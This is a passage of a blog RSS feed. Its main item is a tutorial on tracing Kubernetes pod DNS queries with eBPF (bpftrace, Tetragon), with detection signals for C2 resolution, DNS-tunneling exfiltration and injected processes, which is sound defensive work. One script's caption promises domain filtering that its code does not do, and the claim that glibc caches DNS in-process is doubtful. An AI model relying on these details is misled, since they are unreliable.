href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Flinuxcent.com%2Febpf-process-lineage-incident-response%2F&amp;linkname=Process%20Lineage%20%E2%80%94%20Reconstructing%20What%20Happened%20After%20the%20Fact" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_copy_link" href="https://www.addtoany.com/add_to/copy_link?linkurl=https%3A%2F%2Flinuxcent.com%2Febpf-process-lineage-incident-response%2F&amp;linkname=Process%20Lineage%20%E2%80%94%20Reconstructing%20What%20Happened%20After%20the%20Fact" title="Copy Link" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share" href="https://www.addtoany.com/share#url=https%3A%2F%2Flinuxcent.com%2Febpf-process-lineage-incident-response%2F&#038;title=Process%20Lineage%20%E2%80%94%20Reconstructing%20What%20Happened%20After%20the%20Fact" data-a2a-url="https://linuxcent.com/ebpf-process-lineage-incident-response/" data-a2a-title="Process Lineage — Reconstructing What Happened After the Fact"></a></p><p>The post <a href="https://linuxcent.com/ebpf-process-lineage-incident-response/">Process Lineage — Reconstructing What Happened After the Fact</a> appeared first on <a href="https://linuxcent.com">Linuxcent</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://linuxcent.com/ebpf-process-lineage-incident-response/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">1842</post-id>	</item>
		<item>
		<title>DNS at the Kernel Level — What Your Pods Are Actually Resolving</title>
		<link>https://linuxcent.com/ebpf-dns-observability-kubernetes/</link>
					<comments>https://linuxcent.com/ebpf-dns-observability-kubernetes/#respond</comments>
		
		<dc:creator><![CDATA[Vamshi Krishna Santhapuri]]></dc:creator>
		<pubDate>Sat, 06 Jun 2026 02:00:00 +0000</pubDate>
				<category><![CDATA[eBPF]]></category>
		<category><![CDATA[CoreDNS]]></category>
		<category><![CDATA[DNS]]></category>
		<category><![CDATA[Kubernetes]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[Observability]]></category>
		<category><![CDATA[SRE]]></category>
		<category><![CDATA[Tracing]]></category>
		<guid isPermaLink="false">https://linuxcent.com/?p=1840</guid>

					<description><![CDATA[<p><span class="span-reading-time rt-reading-time" style="display: block;"><span class="rt-label rt-prefix">Reading Time: </span> <span class="rt-time"> 9</span> <span class="rt-label rt-postfix">minutes</span></span>Trace every DNS query your pods make — in real time at the kernel level — using eBPF tracepoints. No sidecar, no restart, no sampling. Visibility CoreDNS metrics can't give you.</p>
<p>The post <a href="https://linuxcent.com/ebpf-dns-observability-kubernetes/">DNS at the Kernel Level — What Your Pods Are Actually Resolving</a> appeared first on <a href="https://linuxcent.com">Linuxcent</a>.</p>
]]></description>
										<content:encoded><![CDATA[<span class="span-reading-time rt-reading-time" style="display: block;"><span class="rt-label rt-prefix">Reading Time: </span> <span class="rt-time"> 9</span> <span class="rt-label rt-postfix">minutes</span></span><style>
pre{position:relative;background:#1e1e1e;color:#d4d4d4;
    padding:16px 16px 16px 20px;border-radius:6px;overflow-x:auto;
    font-family:'JetBrains Mono','Fira Code','Cascadia Code',Consolas,'Courier New',monospace;
    font-size:.88em;line-height:1.6;border-left:4px solid #555}
code{background:#f4f4f4;padding:2px 5px;border-radius:3px;font-size:.9em}
pre code{background:transparent;padding:0;color:inherit}
pre[data-lang="bash"],pre[data-lang="sh"],
pre[data-lang="shell"],pre[data-lang="zsh"]{border-left-color:#4ec9b0}
pre[data-lang="yaml"],pre[data-lang="json"],
pre[data-lang="toml"],pre[data-lang="xml"]{border-left-color:#569cd6}
pre[data-lang="python"],pre[data-lang="go"],pre[data-lang="rust"],
pre[data-lang="java"],pre[data-lang="c"],pre[data-lang="cpp"]{border-left-color:#c586c0}
pre[data-lang="text"],pre[data-lang="output"],
pre[data-lang="console"]{border-left-color:#888}
.lc-copy-btn{position:absolute;top:8px;right:8px;background:#2d2d2d;color:#ccc;
    border:1px solid #444;border-radius:4px;padding:3px 9px;font-size:.75em;
    font-family:system-ui,sans-serif;cursor:pointer;opacity:0;
    transition:opacity .15s,background .15s;line-height:1.6}
pre:hover .lc-copy-btn{opacity:1}
.lc-copy-btn:hover{background:#3a3a3a;color:#fff}
.lc-copy-btn.copied{color:#4ec9b0;border-color:#4ec9b0}
.lc-lang-badge{position:absolute;top:8px;left:20px;font-family:system-ui,sans-serif;
    font-size:.7em;color:#666;text-transform:uppercase;letter-spacing:.04em;
    line-height:1;pointer-events:none;opacity:0;transition:opacity .15s}
pre:hover .lc-lang-badge{opacity:1}
table{border-collapse:collapse;width:100%;margin:16px 0}
th,td{border:1px solid #ddd;padding:10px 14px;text-align:left}
th{background:#f0f0f0;font-weight:600}
tr:nth-child(even){background:#fafafa}
</style>
<p><script>
(function(){
  if(window.__lcCodeEnhanced)return;
  window.__lcCodeEnhanced=true;
  function enhance(){
    document.querySelectorAll('pre').forEach(function(pre){
      var code=pre.querySelector('code');
      var lang='';
      if(code){var m=(code.className||'').match(/language-(\S+)/);if(m)lang=m[1].toLowerCase();}
      if(lang)pre.setAttribute('data-lang',lang);
      if(lang){var badge=document.createElement('span');badge.className='lc-lang-badge';badge.textContent=lang;pre.insertBefore(badge,pre.firstChild);}
      var btn=document.createElement('button');
      btn.className='lc-copy-btn';btn.textContent='Copy';btn.setAttribute('aria-label','Copy code to clipboard');
      pre.appendChild(btn);
      btn.addEventListener('click',function(){
        var text=code?code.innerText:pre.innerText;
        if(navigator.clipboard&&window.isSecureContext){
          navigator.clipboard.writeText(text).then(function(){ok(btn);}).catch(function(){fb(text,btn);});
        }else{fb(text,btn);}
      });
    });
  }
  function ok(btn){btn.textContent='Copied!';btn.classList.add('copied');setTimeout(function(){btn.textContent='Copy';btn.classList.remove('copied');},2000);}
  function fb(text,btn){
    try{var ta=document.createElement('textarea');ta.value=text;ta.style.cssText='position:fixed;left:-9999px;top:-9999px;opacity:0';document.body.appendChild(ta);ta.select();document.execCommand('copy');document.body.removeChild(ta);ok(btn);}
    catch(e){btn.textContent='✗ Failed';setTimeout(function(){btn.textContent='Copy';},2000);}
  }
  if(document.readyState==='loading'){document.addEventListener('DOMContentLoaded',enhance);}else{enhance();}
})();
</script></p>
<p><em>eBPF: From Kernel to Cloud, Episode 11</em><br />
<a href="/what-is-ebpf/">What Is eBPF?</a> · <a href="/ebpf-verifier-safety/">The BPF Verifier</a> · <a href="/ebpf-vs-kernel-modules/">eBPF vs Kernel Modules</a> · <a href="/ebpf-program-types/">eBPF Program Types</a> · <a href="/ebpf-maps-persistent-data/">eBPF Maps</a> · <a href="/co-re-libbpf-write-once/">CO-RE and libbpf</a> · <a href="/xdp-network-fast-path/">XDP</a> · <a href="/tc-ebpf-pod-network-policy/">TC eBPF</a> · <a href="/bpftrace-kernel-observability/">bpftrace</a> · <a href="/network-flow-observability-ebpf/">Network Flow Observability</a> · <strong>DNS Observability</strong></p>
<hr />
<p style="font-size:0.72em;font-weight:700;letter-spacing:0.12em;color:#f59e0b;text-transform:uppercase;margin:2em 0 0.75em 0;text-align:center;">Architecture Overview</p>
<figure class="wp-block-image size-full" style="margin:0 0 0.5em 0;">
<img decoding="async" width="2392" height="2560" src="https://linuxcent.com/wp-content/uploads/2026/05/ep11-dns-observability-og-2-scaled.png" alt="eBPF DNS Kernel Observability — kernel-level DNS event capture without touching application code" class="wp-image-2120" style="width:100%;height:auto;display:block;border-radius:8px;" srcset="https://linuxcent.com/wp-content/uploads/2026/05/ep11-dns-observability-og-2-scaled.png 2392w, https://linuxcent.com/wp-content/uploads/2026/05/ep11-dns-observability-og-2-280x300.png 280w, https://linuxcent.com/wp-content/uploads/2026/05/ep11-dns-observability-og-2-957x1024.png 957w, https://linuxcent.com/wp-content/uploads/2026/05/ep11-dns-observability-og-2-768x822.png 768w, https://linuxcent.com/wp-content/uploads/2026/05/ep11-dns-observability-og-2-1435x1536.png 1435w, https://linuxcent.com/wp-content/uploads/2026/05/ep11-dns-observability-og-2-1913x2048.png 1913w" sizes="(max-width: 2392px) 100vw, 2392px" /><figcaption style="text-align:center;font-size:0.85em;color:#6b7280;margin-top:0.75em;">eBPF intercepts DNS at the kernel socket layer — capturing query, response, and latency without application changes.</figcaption></figure>
<hr style="border:none;border-top:1px solid #e5e7eb;margin:0.5em 0 2em 0;"/>
<h2 id="tldr">TL;DR</h2>
<ul>
<li>DNS observability in Kubernetes with eBPF hooks the kernel&#8217;s DNS syscall path — giving you per-pod query visibility without sidecars, restarts, or CoreDNS log scraping<br />
  <em>(tracepoint = a stable, versioned hook placed deliberately in the Linux kernel source; unlike kprobes, tracepoints survive kernel upgrades without breakage)</em></li>
<li>CoreDNS metrics tell you aggregate query rates; eBPF tracepoints tell you which pod queried what domain, when, and what was returned</li>
<li>A compromised workload&#8217;s first observable action is almost always an unexpected DNS query — infrastructure no legitimate process should ever resolve</li>
<li>The DNS syscall path in Linux goes: application calls <code class="" data-line="">getaddrinfo()</code> → glibc → <code class="" data-line="">sendto()</code> syscall → kernel network stack → UDP packet to CoreDNS resolver</li>
<li>You hook the <code class="" data-line="">sendto</code> tracepoint to catch the query leaving the pod and the <code class="" data-line="">recvfrom</code> tracepoint to catch the response arriving</li>
<li>Production note: DNS query payloads cross the kernel as raw UDP — parsing the DNS wire format in a bpftrace one-liner requires reading past the UDP header; Tetragon and Pixie do this parsing in the eBPF program itself</li>
</ul>
<hr />
<p>EP10 showed eBPF flow telemetry as the ground truth for what connections your pods are making. DNS observability with eBPF goes one layer beneath that: the name resolution step that happens before any connection is established. Every domain a pod resolves is visible at the kernel level. That visibility is what a security scan alert is missing when it flags &#8220;unexpected DNS queries&#8221; — it can see the traffic on the wire, but it can&#8217;t tell you which pod sent it without restarting or deploying an agent into the pod.</p>
<h2 id="quick-check-what-dns-traffic-is-leaving-your-pods-right-now">Quick Check: What DNS Traffic Is Leaving Your Pods Right Now?</h2>
<p>Without installing anything, you can see DNS queries crossing any node in under 30 seconds:</p>
<pre><code class="" data-line=""># SSH into a worker node, then:

# Watch all UDP port 53 traffic — which processes are making DNS queries?
bpftrace -e &#039;
tracepoint:syscalls:sys_enter_sendto {
    $port = (uint16)((uint8*)args-&gt;addr)[3] &lt;&lt; 8 |
            (uint16)((uint8*)args-&gt;addr)[2];
    if ($port == 53) {
        printf(&quot;%-20s %-6d DNS query (UDP sendto)\n&quot;, comm, pid);
    }
}&#039; --timeout 30
</code></pre>
<p>Expected output:</p>
<pre><code class="" data-line="">coredns              1842   DNS query (UDP sendto)   # ← CoreDNS forwarding upstream
nginx                9231   DNS query (UDP sendto)   # ← nginx resolving upstream
payment-svc          11043  DNS query (UDP sendto)   # ← your service making queries
curl                 14829  DNS query (UDP sendto)   # ← kubectl exec / debug session
</code></pre>
<pre><code class="" data-line=""># How many DNS queries per process in the last 30 seconds?
bpftrace -e &#039;
tracepoint:syscalls:sys_enter_sendto {
    $port = (uint16)((uint8*)args-&gt;addr)[3] &lt;&lt; 8 |
            (uint16)((uint8*)args-&gt;addr)[2];
    if ($port == 53) { @dns_queries[comm] = count(); }
}
interval:s:30 { print(@dns_queries); exit(); }
&#039;
</code></pre>
<p>Expected output:</p>
<pre><code class="" data-line="">@dns_queries[coredns]:       1203   # ← upstream forwarder traffic
@dns_queries[payment-svc]:    847   # ← legitimate service queries
@dns_queries[unknown]:         12   # ← investigate this one
</code></pre>
<blockquote>
<p><strong>On EKS or GKE managed nodes:</strong> You may not be able to SSH directly to worker nodes, but you can run a privileged debug pod: <code class="" data-line="">kubectl debug node/&lt;node-name&gt; -it --image=quay.io/iovisor/bpftrace</code>. The bpftrace program runs on the host kernel and sees all pods&#8217; DNS queries. GKE Autopilot restricts privileged pods — use GKE&#8217;s built-in eBPF-based DNS observability instead (enabled via Cloud Logging with DNS policy logging).</p>
</blockquote>
<hr />
<p>A security scan flagged unexpected DNS queries from <code class="" data-line="">payment-svc</code> in the production namespace. The query domains didn&#8217;t match anything in the service&#8217;s known dependency list. The scan tool showed the traffic on the wire — destination port 53, from the pod&#8217;s IP — but couldn&#8217;t tell us which process inside the pod was responsible or what domain was being queried without pulling the pod&#8217;s DNS logs.</p>
<p>The pod had no DNS logging enabled. CoreDNS showed the queries in its aggregate metrics but with no attribution below namespace level. Restarting the pod to add a DNS sidecar would wipe any in-memory state the process had accumulated.</p>
<p>I ran bpftrace with a <code class="" data-line="">recvfrom</code> hook to catch the DNS response payloads coming back into the pod:</p>
<pre><code class="" data-line="">bpftrace -e &#039;
tracepoint:syscalls:sys_exit_recvfrom {
    if (retval &gt; 0) {
        printf(&quot;%-20s PID %-6d received %d bytes (possible DNS response)\n&quot;,
               comm, pid, retval);
    }
}&#039; --timeout 60
</code></pre>
<p>Then cross-referenced the PIDs to container processes via <code class="" data-line="">/proc/&lt;pid&gt;/cgroup</code>. The unexpected queries were coming from a sidecar process that had been injected by a recent Helm chart change — not from the main application container at all. A misconfigured Datadog agent injected into the wrong namespace was querying its intake endpoint.</p>
<p>No restart. No sidecar deployment. Found in under two minutes.</p>
<hr />
<h2 id="why-coredns-metrics-dont-give-you-this">Why CoreDNS Metrics Don&#8217;t Give You This</h2>
<p>CoreDNS exposes DNS query metrics via Prometheus. Those metrics tell you:<br />
&#8211; Total queries per second across the cluster<br />
&#8211; Query latency histograms<br />
&#8211; Error rates (NXDOMAIN, SERVFAIL)<br />
&#8211; Upstream forwarder health</p>
<p>What they don&#8217;t tell you:<br />
&#8211; Which specific pod sent a query to a specific domain<br />
&#8211; Which process inside that pod made the <code class="" data-line="">getaddrinfo()</code> call<br />
&#8211; Whether the query came from the main container or an injected sidecar<br />
&#8211; The timing relationship between a DNS query and the connection that followed it</p>
<p>CoreDNS sees the query after it arrives at the resolver. eBPF tracepoints see the query at the moment the pod&#8217;s process issues the <code class="" data-line="">sendto()</code> syscall — before it leaves the node. The difference is attribution.</p>
<hr />
<h2 id="the-dns-syscall-path-in-linux">The DNS Syscall Path in Linux</h2>
<p>Understanding where the hook fires helps you reason about what you can observe:</p>
<pre><code class="" data-line="">Application code
    ↓
getaddrinfo(&quot;api.example.com&quot;) ← glibc resolver function
    ↓
glibc reads /etc/resolv.conf → finds nameserver 10.96.0.10 (CoreDNS ClusterIP)
    ↓
glibc builds DNS wire-format query packet
    ↓
sendto(sockfd, buf, len, 0, &amp;resolver_addr, addrlen)
    ↓                     ← eBPF tracepoint fires here: sys_enter_sendto
Linux kernel: udp_sendmsg()
    ↓
Packet leaves pod veth interface
    ↓
TC eBPF on veth sees UDP packet (flow telemetry picks this up too)
    ↓
CoreDNS receives query, resolves, sends response
    ↓
Packet arrives back at pod veth
    ↓
recvfrom(sockfd, buf, len, 0, &amp;src_addr, &amp;src_len)
    ↓                     ← eBPF tracepoint fires here: sys_exit_recvfrom
glibc parses DNS response
    ↓
getaddrinfo() returns IP addresses to application
</code></pre>
<blockquote>
<p><strong><code class="" data-line="">getaddrinfo</code></strong> — the standard POSIX function applications call to resolve a hostname to IP addresses. It lives in glibc, not in the kernel. The kernel never sees the domain name string directly — it only sees the UDP packet carrying the DNS wire-format query. To read the actual domain name in an eBPF program, you parse the DNS packet payload at the <code class="" data-line="">sendto</code> tracepoint.</p>
<p><strong><code class="" data-line="">tracepoint</code></strong> — a stable, versioned hook deliberately placed in Linux kernel source code by kernel developers. Unlike kprobes (which attach to arbitrary kernel functions and break when those functions change), tracepoints are part of the kernel&#8217;s stable interface. The <code class="" data-line="">syscalls:sys_enter_sendto</code> tracepoint has been present and stable since kernel 3.x. You can rely on it across Ubuntu 20.04 through the latest kernels without version checks.</p>
</blockquote>
<hr />
<h2 id="reading-dns-queries-at-the-tracepoint">Reading DNS Queries at the Tracepoint</h2>
<p>The <code class="" data-line="">sendto</code> tracepoint fires when any process sends data on a socket. Filtering to port 53 gives you DNS queries. Parsing the payload gives you the domain name.</p>
<p>The DNS wire format for a query:</p>
<pre><code class="" data-line="">Bytes 0-11:   DNS header (12 bytes)
              - Transaction ID (2 bytes)
              - Flags (2 bytes)
              - QDCount, ANCount, NSCount, ARCount (2 bytes each)
Byte 12+:     Question section
              - QNAME (variable length, label-encoded)
              - QTYPE (2 bytes)
              - QCLASS (2 bytes)
</code></pre>
<p>The QNAME is length-prefixed labels: <code class="" data-line="">\x03api\x07example\x03com\x00</code> for <code class="" data-line="">api.example.com</code>. bpftrace can read the raw bytes but parsing label encoding inline in a one-liner is awkward. For raw query detection (flag any DNS query from a specific process), the tracepoint is enough:</p>
<pre><code class="" data-line=""># Watch DNS queries from a specific process name — replace &quot;payment-svc&quot;
bpftrace -e &#039;
tracepoint:syscalls:sys_enter_sendto /comm == &quot;payment-svc&quot;/ {
    printf(&quot;PID %-6d sending %d bytes to DNS\n&quot;, pid, args-&gt;len);
}
&#039;
</code></pre>
<p>For full domain name extraction, use a tool that implements DNS wire-format parsing in its eBPF layer. Tetragon and Pixie both do this. On a Tetragon-instrumented cluster:</p>
<pre><code class="" data-line=""># Watch DNS queries with domain names — Tetragon (all pods)
kubectl exec -n kube-system -it $(kubectl get pod -n kube-system -l app.kubernetes.io/name=tetragon -o name | head -1) \
  -- tetra getevents --event-types PROCESS_KPROBE \
  | grep -i dns
</code></pre>
<p>Sample Tetragon output:</p>
<pre><code class="" data-line="">{
  &quot;process&quot;: {
    &quot;pod&quot;: {&quot;name&quot;: &quot;payment-svc-7d4b9f-xk2p1&quot;, &quot;namespace&quot;: &quot;production&quot;},
    &quot;binary&quot;: &quot;/usr/bin/payment-service&quot;,
    &quot;pid&quot;: 11043
  },
  &quot;function_name&quot;: &quot;__sys_sendto&quot;,
  &quot;args&quot;: [
    {&quot;sock_arg&quot;: {&quot;family&quot;: &quot;AF_INET&quot;, &quot;protocol&quot;: &quot;UDP&quot;,
                  &quot;daddr&quot;: &quot;10.96.0.10&quot;, &quot;dport&quot;: 53}},
    {&quot;bytes_arg&quot;: &quot;&lt;DNS query for metrics.datadoghq.com&gt;&quot;}
  ]
}
</code></pre>
<p>Pod name, namespace, binary, PID, and the domain being queried — all from a kernel tracepoint, no sidecar, no pod restart.</p>
<hr />
<h2 id="building-pod-level-dns-attribution-without-tetragon">Building Pod-Level DNS Attribution Without Tetragon</h2>
<p>If you&#8217;re not running Tetragon, you can build pod-level attribution from the PID. When bpftrace reports a PID making a DNS query, map it to a container:</p>
<pre><code class="" data-line=""># Get the PID from bpftrace, then:
PID=11043

# Which cgroup does this PID belong to? (maps to container/pod)
cat /proc/$PID/cgroup | grep kubepods
# 12:cpu:/kubepods/burstable/pod3f8a21bc-4e7d-4b91-a3c2-8b947f6e3d12/a4c8f1e2b3d4...
# The pod UID is embedded: pod3f8a21bc-4e7d-4b91-a3c2-8b947f6e3d12

# Map pod UID to pod name
kubectl get pods -A -o jsonpath=&#039;{range .items[*]}{.metadata.uid}{&quot; &quot;}{.metadata.name}{&quot; &quot;}{.metadata.namespace}{&quot;\n&quot;}{end}&#039; \
  | grep 3f8a21bc-4e7d-4b91-a3c2-8b947f6e3d12
# 3f8a21bc-4e7d-4b91-a3c2-8b947f6e3d12  payment-svc-7d4b9f-xk2p1  production
</code></pre>
<p>That&#8217;s the full chain: kernel tracepoint → host PID → cgroup path → pod UID → pod name + namespace. Automatable. No agents required inside the pod.</p>
<hr />
<h2 id="detecting-anomalous-dns-what-to-watch-for">Detecting Anomalous DNS: What to Watch For</h2>
<p>DNS is the first observable action in most attack chains. A process that has been compromised or injected typically cannot establish a C2 connection without first resolving the C2 domain.</p>
<p>Signals worth watching at the kernel DNS layer:</p>
<p><strong>Queries to non-cluster domains from unexpected processes</strong></p>
<pre><code class="" data-line=""># Flag any DNS query to a non-cluster domain (not .cluster.local or .svc.cluster.local)
bpftrace -e &#039;
tracepoint:syscalls:sys_enter_sendto {
    $port = (uint16)((uint8*)args-&gt;addr)[3] &lt;&lt; 8 |
            (uint16)((uint8*)args-&gt;addr)[2];
    if ($port == 53) {
        printf(&quot;%-20s %-6d DNS sendto\n&quot;, comm, pid);
    }
}&#039; --timeout 60
</code></pre>
<p><strong>High-frequency DNS queries from a single process</strong> (DNS tunneling fingerprint)</p>
<pre><code class="" data-line=""># Processes making more than N DNS queries per second
bpftrace -e &#039;
tracepoint:syscalls:sys_enter_sendto {
    $port = (uint16)((uint8*)args-&gt;addr)[3] &lt;&lt; 8 |
            (uint16)((uint8*)args-&gt;addr)[2];
    if ($port == 53) { @[pid, comm] = count(); }
}
interval:s:1 {
    print(@);
    clear(@);
}
&#039;
</code></pre>
<p>DNS tunneling exfiltrates data by encoding it in subdomains of queries. A process making 50+ DNS queries per second to varied subdomains of the same parent domain is a strong signal. CoreDNS aggregate metrics will show elevated query volume; the kernel tracepoint tells you which PID is responsible.</p>
<p><strong>Queries immediately followed by a connection</strong> (normal vs anomalous pattern)</p>
<p>Legitimate services resolve a known set of domains. A process that resolves a new, never-before-seen domain and immediately opens a TCP connection to the returned IP is structurally different from normal service behavior. The combination of DNS tracepoint + TCP connect kprobe lets you correlate these events by PID and timestamp — without any application instrumentation.</p>
<hr />
<h2 id="production-gotchas"><img src="https://s.w.org/images/core/emoji/17.0.2/72x72/26a0.png" alt="⚠" class="wp-smiley" style="height: 1em; max-height: 1em;" /> Production Gotchas</h2>
<p><strong>DNS payload parsing is not trivial in bpftrace.</strong> Reading the domain name from the UDP payload requires byte-level parsing of the DNS wire format inside an eBPF program. bpftrace can read raw bytes with <code class="" data-line="">buf()</code>, but the label-encoded domain name format requires a loop that the verifier may reject for complexity reasons. Tools like Tetragon and Pixie implement this parsing in C within their eBPF programs where they have more control over verifier limits. For raw detection (flag DNS queries from unexpected processes), the sendto tracepoint without payload parsing is enough.</p>
<p><strong><code class="" data-line="">sendto</code> fires for all UDP, not just DNS.</strong> Filter on the destination port. The destination address structure is at <code class="" data-line="">args-&gt;addr</code> — port is in network byte order at bytes 2–3 of the <code class="" data-line="">sockaddr_in</code> structure. The filtering in the examples above is correct for port 53; double-check if you&#8217;re on a cluster that uses a non-standard DNS port.</p>
<p><strong>CoreDNS pods will appear in your DNS query trace — that&#8217;s expected.</strong> CoreDNS makes upstream DNS queries to resolve non-cluster domains. Filter on namespace/cgroup if you want to exclude CoreDNS from your trace.</p>
<p><strong>DNS over TCP is a separate code path.</strong> Most DNS queries are UDP. Large responses (&gt;512 bytes) or DNSSEC responses may trigger TCP fallback. The <code class="" data-line="">sendto</code> tracepoint catches UDP; for TCP DNS, you&#8217;d need <code class="" data-line="">tcp_sendmsg</code> with port 53 filtering. In practice, within-cluster DNS resolution is almost entirely UDP.</p>
<p><strong>glibc caching means not every <code class="" data-line="">getaddrinfo()</code> generates a DNS query.</strong> glibc caches resolved hostnames in the process&#8217;s memory. A service that calls <code class="" data-line="">getaddrinfo(&quot;api.example.com&quot;)</code> every 100ms may only generate a DNS query every 30 seconds (the TTL). If you&#8217;re looking for which pods are resolving a domain and see only occasional tracepoint hits, that&#8217;s expected — it&#8217;s the cache miss rate, not the access rate.</p>
<hr />
<h2 id="quick-reference">Quick Reference</h2>
<table>
<thead>
<tr>
<th>What you want</th>
<th>Command</th>
</tr>
</thead>
<tbody>
<tr>
<td>All DNS queries on a node</td>
<td><code class="" data-line="">bpftrace -e &#039;tracepoint:syscalls:sys_enter_sendto { if (port == 53) ... }&#039;</code></td>
</tr>
<tr>
<td>DNS query count per process</td>
<td><code class="" data-line="">bpftrace -e &#039;... { @[comm] = count(); }&#039;</code></td>
</tr>
<tr>
<td>DNS queries from a specific process</td>
<td><code class="" data-line="">bpftrace -e &#039;... /comm == &quot;my-svc&quot;/ { ... }&#039;</code></td>
</tr>
<tr>
<td>Map PID to pod</td>
<td><code class="" data-line="">cat /proc/&lt;pid&gt;/cgroup</code> → extract pod UID → <code class="" data-line="">kubectl get pods</code></td>
</tr>
<tr>
<td>DNS events with domain names (Tetragon)</td>
<td><code class="" data-line="">tetra getevents --event-types PROCESS_KPROBE</code></td>
</tr>
<tr>
<td>DNS policy violations (Cilium)</td>
<td><code class="" data-line="">hubble observe --verdict DROPPED --protocol DNS</code></td>
</tr>
<tr>
<td>CoreDNS query logs</td>
<td><code class="" data-line="">kubectl logs -n kube-system -l k8s-app=kube-dns</code></td>
</tr>
</tbody>
</table>
<table>
<thead>
<tr>
<th>DNS signal</th>
<th>What it indicates</th>
</tr>
</thead>
<tbody>
<tr>
<td>New domain, immediate TCP connect</td>
<td>Possible C2 resolution</td>
</tr>
<tr>
<td>50+ queries/second from one PID</td>
<td>DNS tunneling candidate</td>
</tr>
<tr>
<td>Query to non-cluster domain from batch job</td>
<td>Unusual — investigate</td>
</tr>
<tr>
<td>NXDOMAIN responses at high rate</td>
<td>Misconfiguration or DGA</td>
</tr>
<tr>
<td>Queries from PID not matching any known binary</td>
<td>Injected process</td>
</tr>
</tbody>
</table>
<hr />
<h2 id="key-takeaways">Key Takeaways</h2>
<ul>
<li>DNS observability in Kubernetes with eBPF uses the <code class="" data-line="">sendto</code> tracepoint — the hook fires when the process issues the syscall, before the packet leaves the node, giving you PID-level attribution with no sidecar</li>
<li>CoreDNS metrics show aggregate DNS health; kernel tracepoints show which pod and which process made each query — the attribution gap between the two is where anomaly detection lives</li>
<li>The DNS syscall path goes: <code class="" data-line="">getaddrinfo()</code> → glibc → <code class="" data-line="">sendto()</code> syscall → kernel UDP stack → CoreDNS. eBPF hooks fire at the <code class="" data-line="">sendto()</code> boundary</li>
<li>A compromised workload&#8217;s first observable action is almost always a DNS query; tracepoint-based DNS observability catches it at the kernel level, ahead of any application log</li>
<li>glibc caches resolved names, so tracepoint hit rate reflects cache misses, not <code class="" data-line="">getaddrinfo()</code> call rate — account for this when baselining</li>
<li>Full domain name extraction requires DNS wire-format parsing; Tetragon and Pixie do this in their eBPF programs; bpftrace one-liners detect the query event without the domain string</li>
</ul>
<hr />
<h2 id="whats-next">What&#8217;s Next</h2>
<p>DNS observability tells you what a workload is resolving. EP12 answers what happens when you want to stop a workload from doing something — not detect it after the fact, but prevent it at the syscall boundary before it completes.</p>
<p>LSM hooks and Tetragon&#8217;s kill path enforce at the kernel level. When the kernel enforces, the process never gets the return value from the syscall. There is no &#8220;detect and respond&#8221; window — the action simply does not complete. That is a structurally different security posture from anything a sidecar or userspace agent can provide.</p>
<p><em>Next: <a href="/lsm-ebpf-tetragon-kernel-enforcement/">LSM and Tetragon — when the kernel says no</a></em></p>
<p>Get EP12 in your inbox when it publishes → <a href="https://linuxcent.com/subscribe">linuxcent.com/subscribe</a></p>
<p><a class="a2a_button_mastodon" href="https://www.addtoany.com/add_to/mastodon?linkurl=https%3A%2F%2Flinuxcent.com%2Febpf-dns-observability-kubernetes%2F&amp;linkname=DNS%20at%20the%20Kernel%20Level%20%E2%80%94%20What%20Your%20Pods%20Are%20Actually%20Resolving" title="Mastodon" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Flinuxcent.com%2Febpf-dns-observability-kubernetes%2F&amp;linkname=DNS%20at%20the%20Kernel%20Level%20%E2%80%94%20What%20Your%20Pods%20Are%20Actually%20Resolving" title="Email" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_whatsapp" href="https://www.addtoany.com/add_to/whatsapp?linkurl=https%3A%2F%2Flinuxcent.com%2Febpf-dns-observability-kubernetes%2F&amp;linkname=DNS%20at%20the%20Kernel%20Level%20%E2%80%94%20What%20Your%20Pods%20Are%20Actually%20Resolving" title="WhatsApp" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Flinuxcent.com%2Febpf-dns-observability-kubernetes%2F&amp;linkname=DNS%20at%20the%20Kernel%20Level%20%E2%80%94%20What%20Your%20Pods%20Are%20Actually%20Resolving" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_x" href="https://www.addtoany.com/add_to/x?linkurl=https%3A%2F%2Flinuxcent.com%2Febpf-dns-observability-kubernetes%2F&amp;linkname=DNS%20at%20the%20Kernel%20Level%20%E2%80%94%20What%20Your%20Pods%20Are%20Actually%20Resolving" title="X" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Flinuxcent.com%2Febpf-dns-observability-kubernetes%2F&amp;linkname=DNS%20at%20the%20Kernel%20Level%20%E2%80%94%20What%20Your%20Pods%20Are%20Actually%20Resolving" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_copy_link" href="https://www.addtoany.com/add_to/copy_link?linkurl=https%3A%2F%2Flinuxcent.com%2Febpf-dns-observability-kubernetes%2F&amp;linkname=DNS%20at%20the%20Kernel%20Level%20%E2%80%94%20What%20Your%20Pods%20Are%20Actually%20Resolving" title="Copy Link" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share" href="https://www.addtoany.com/share#url=https%3A%2F%2Flinuxcent.com%2Febpf-dns-observability-kubernetes%2F&#038;title=DNS%20at%20the%20Kernel%20Level%20%E2%80%94%20What%20Your%20Pods%20Are%20Actually%20Resolving" data-a2a-url="https://linuxcent.com/ebpf-dns-observability-kubernetes/" data-a2a-title="DNS at the Kernel Level — What Your Pods Are Actually Resolving"></a></p><p>The post <a href="https://linuxcent.com/ebpf-dns-observability-kubernetes/">DNS at the Kernel Level — What Your Pods Are Actually Resolving</a> appeared first on <a href="https://linuxcent.com">Linuxcent</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://linuxcent.com/ebpf-dns-observability-kubernetes/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">1840</post-id>	</item>
		<item>
		<title>Stratum — OS Hardening as a Platform</title>
		<link>https://linuxcent.com/stratum-os-hardening-platform/</link>
